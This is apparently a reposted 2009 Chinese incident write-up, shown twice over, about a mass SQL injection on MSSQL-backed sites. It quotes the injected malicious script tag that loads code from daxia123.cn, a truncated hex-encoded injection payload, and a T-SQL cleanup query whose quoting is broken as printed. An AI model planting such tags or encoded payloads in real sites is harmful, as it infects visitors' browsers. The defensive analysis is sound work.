网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因
2009-11-23 14:28
357 查看
------------------------------------------------------------
网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因
客户站,出现生成不了,被挂马。谈不上解决,只找到原因
现状:
各CMS系统无法生成,但是其它操作正常。生成时一般提示“<' 附近有语法错”和“路径参数超过了最大允许长度。”
受影响对象:采用MSSQL数据库的网站
症状内容:在多个表当中出现挂马代码,如<Script Src=http://cn.daxia123.cn/cn.js> </Script>
数据库出现新增表:如kill_kk表,xiaolu表
分析如下:
kill_kk表为入侵者读取网站根目录的工具,被入侵网站的根目录下所有的文件夹与文件名都保存在此。
xiaolu表:只有一个字段CMD,二进制位。原因不详。
多个表中的字段内出现挂马内容,字段多为vchar,字段长度大于100,
被攻击原因如下:
攻击者将攻击代码用2进制,或10或10进制编译成了类似于这样的代码:0x4445434C415245204054205641524348415228323535292C404 放sql注入的代码不能检测出来,但是sql server 会把这样的代码在解释成原来的样子
这样就绕过了sql防注入代码。
但是,这个代码仅对能解释它的sql server这样的数据库有效,针对access这样的不能解释它的数据库类型攻击无效。
希望微软尽快发补丁。
临时清除办法:
1、批量查找哪些表被挂马了,这一步对大站多表很有用
declare @str varchar(100)
set @str='daxia123' //这地方放你所被挂马的关键字;
declare @s varchar(8000)
declare tb cursor local for
select s='if exists(select 1 from ['+b.name+'] where ['+a.name+'] like % +@str+ %)
print ''所在的表及字段: ['+b.name+'].['+a.name+']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xusertype in(175,239,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
代码执行完,会提示哪些表中招了。
你再去清除相关字段内容。
临时解决办法:
查找所有vchar型且字段长度比较大的字段,尽量改小长度。
再通过判断post值的长度来临时解决
网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因
客户站,出现生成不了,被挂马。谈不上解决,只找到原因
现状:
各CMS系统无法生成,但是其它操作正常。生成时一般提示“<' 附近有语法错”和“路径参数超过了最大允许长度。”
受影响对象:采用MSSQL数据库的网站
症状内容:在多个表当中出现挂马代码,如<Script Src=http://cn.daxia123.cn/cn.js> </Script>
数据库出现新增表:如kill_kk表,xiaolu表
分析如下:
kill_kk表为入侵者读取网站根目录的工具,被入侵网站的根目录下所有的文件夹与文件名都保存在此。
xiaolu表:只有一个字段CMD,二进制位。原因不详。
多个表中的字段内出现挂马内容,字段多为vchar,字段长度大于100,
被攻击原因如下:
攻击者将攻击代码用2进制,或10或10进制编译成了类似于这样的代码:0x4445434C415245204054205641524348415228323535292C404 放sql注入的代码不能检测出来,但是sql server 会把这样的代码在解释成原来的样子
这样就绕过了sql防注入代码。
但是,这个代码仅对能解释它的sql server这样的数据库有效,针对access这样的不能解释它的数据库类型攻击无效。
希望微软尽快发补丁。
临时清除办法:
1、批量查找哪些表被挂马了,这一步对大站多表很有用
declare @str varchar(100)
set @str='daxia123' //这地方放你所被挂马的关键字;
declare @s varchar(8000)
declare tb cursor local for
select s='if exists(select 1 from ['+b.name+'] where ['+a.name+'] like % +@str+ %)
print ''所在的表及字段: ['+b.name+'].['+a.name+']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xusertype in(175,239,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
代码执行完,会提示哪些表中招了。
你再去清除相关字段内容。
临时解决办法:
查找所有vchar型且字段长度比较大的字段,尽量改小长度。
再通过判断post值的长度来临时解决
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 火狐无法访问本机IIS部署的网站,弹出:此地址使用了一个通常用于网络浏览以外目的的端口.出于安全原因,Firefox 取消了该请求 的解决办法
- 检查网站是否被挂马及解决办法
- PHP网站从Apache转移到Nginx后产生404错误的原因和解决办法
- PHP网站从Apache转移到Nginx后产生404错误的原因和解决办法
- 网站不能通过W3C验证的十个原因(附解决办法)
- 详解网站沙盒期的原因表现与解决办法
- 网站加载 Waiting (TTFB) 时间过长的原因和解决办法
- 网站有收录没排名的原因与解决办法
- PHP网站从Apache转移到Nginx后产生404错误的原因和解决办法
- 数据库被注入daxia123原因及解决办法
- android NDK开发中,用Cygwin调试本地代码时报错“Another debug session running,Use --force to kill it”原因及解决办法
- 网站不能通过W3C验证的十个原因(附解决办法)
- 重建用户后掉失网站的原因及解决办法
- IIS应用程序池停止,访问网站时出现Service Unavailable的原因和解决办法
- DEDECMS网站被挂马的解决办法
- 您用户网站被黑的原因和解决办法
- dedecms网站出现多图发布无法使用页面空白的原因及解决办法
- firefox margin-top失效的原因与解决办法
- android编程中遇到的关于调试百度地图时出现的 java.lang.UnsatisfiedLinkError: initClass 问题的原因及解决办法
- 视图查不到数据的原因和解决办法 .